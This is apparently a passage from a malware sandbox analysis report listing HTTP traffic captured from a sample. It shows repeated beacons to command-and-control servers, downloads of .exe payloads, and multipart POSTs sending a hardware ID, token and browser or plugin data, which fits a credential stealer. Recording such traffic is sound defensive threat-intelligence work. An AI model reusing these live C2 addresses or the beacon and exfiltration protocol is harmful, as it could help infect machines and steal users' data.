r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 31 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000110001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /down/O3B6wY7ZkFhh.exe HTTP/1.1Host: 43.153.49.49:8888
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 31 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000111001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /down/TpWWMUpe0LEV.exe HTTP/1.1Host: 43.153.49.49:8888Cookie: c50233950c3f39bd96d165eee1995d77=4d35933e-4098-4d9c-a342-9194989f64d0.B0uLxE_ywpoMuQTk0RbwSRoCfc4
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 31 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000112001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIJJKEHCAKEGCAKJKECHost: 65.21.175.0Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 4a 4a 4b 45 48 43 41 4b 45 47 43 41 4b 4a 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 36 34 35 36 33 36 37 36 35 31 43 33 38 39 35 36 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4a 4b 45 48 43 41 4b 45 47 43 41 4b 4a 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6a 6f 70 61 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4a 4b 45 48 43 41 4b 45 47 43 41 4b 4a 4b 45 43 2d 2d 0d 0a Data Ascii: ------CGIJJKEHCAKEGCAKJKECContent-Disposition: form-data; name="hwid"46456367651C389561124------CGIJJKEHCAKEGCAKJKECContent-Disposition: form-data; name="build"jopa------CGIJJKEHCAKEGCAKJKEC--
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDAKFBFBFBAAAAAEBKJHost: 65.21.175.0Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 41 4b 46 42 46 42 46 42 41 41 41 41 41 45 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 66 31 66 64 32 31 65 33 63 30 64 61 64 65 62 39 34 30 31 37 36 31 36 64 32 61 63 39 35 66 32 39 66 35 33 39 39 30 31 30 38 36 65 65 39 35 66 34 32 63 31 64 37 62 32 65 63 64 65 34 31 32 32 37 63 30 62 65 38 62 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 41 4b 46 42 46 42 46 42 41 41 41 41 41 45 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 41 4b 46 42 46 42 46 42 41 41 41 41 41 45 42 4b 4a 2d 2d 0d 0a Data Ascii: ------HJDAKFBFBFBAAAAAEBKJContent-Disposition: form-data; name="token"b8f1fd21e3c0dadeb94017616d2ac95f29f539901086ee95f42c1d7b2ecde41227c0be8b------HJDAKFBFBFBAAAAAEBKJContent-Disposition: form-data; name="message"browsers------HJDAKFBFBFBAAAAAEBKJ--
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCFBAAAFHJDGCBFIIJHost: 65.21.175.0Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 66 31 66 64 32 31 65 33 63 30 64 61 64 65 62 39 34 30 31 37 36 31 36 64 32 61 63 39 35 66 32 39 66 35 33 39 39 30 31 30 38 36 65 65 39 35 66 34 32 63 31 64 37 62 32 65 63 64 65 34 31 32 32 37 63 30 62 65 38 62 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 2d 2d 0d 0a Data Ascii: ------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="token"b8f1fd21e3c0dadeb94017616d2ac95f29f539901086ee95f42c1d7b2ecde41227c0be8b------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="message"plugins------CGHCFBAAAFHJDGCBFIIJ--
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHCGDAFBKFIDHJJJDHCHost: 65.21.175.0Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 43 47 44 41 46 42 4b 46 49 44 48 4a 4a 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 66 31 66 64 32 31 65 33 63 30 64 61 64 65 62 39 34 30 31 37 36 31 36 64 32 61 63 39 35 66 32 39 66 35 33 39 39 30 31 30 38 36 65 65 39 35 66 34 32 63 31 64 37 62 32 65 63 64 65 34 31 32 32 37 63 30 62 65 38 62 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 43 47 44 41 46 42 4b 46 49 44 48 4a 4a 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 43 47 44 41 46 42 4b 46 49 44 48 4a 4a 4a 44 48 43 2d 2d 0d 0a Data Ascii: ------IDHCGDAFBKFIDHJJJDHCContent-Disposition: form-data; name="token"b8f1fd21e3c0dadeb94017616d2ac95f29f539901086ee95f42c1d7b2ecde41227c0be8b------IDHCGDAFBKFIDHJJJDHCContent-Disposition: form-data; name="message"fplugins------IDHCGDAFBKFIDHJJJDHC--
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCFCFCGCGIEHIECAFCFIHost: 65.21.175.0Content-Length: 6531Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/sqlite3.dll HTTP/1.1Host: 65.21.175.0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: 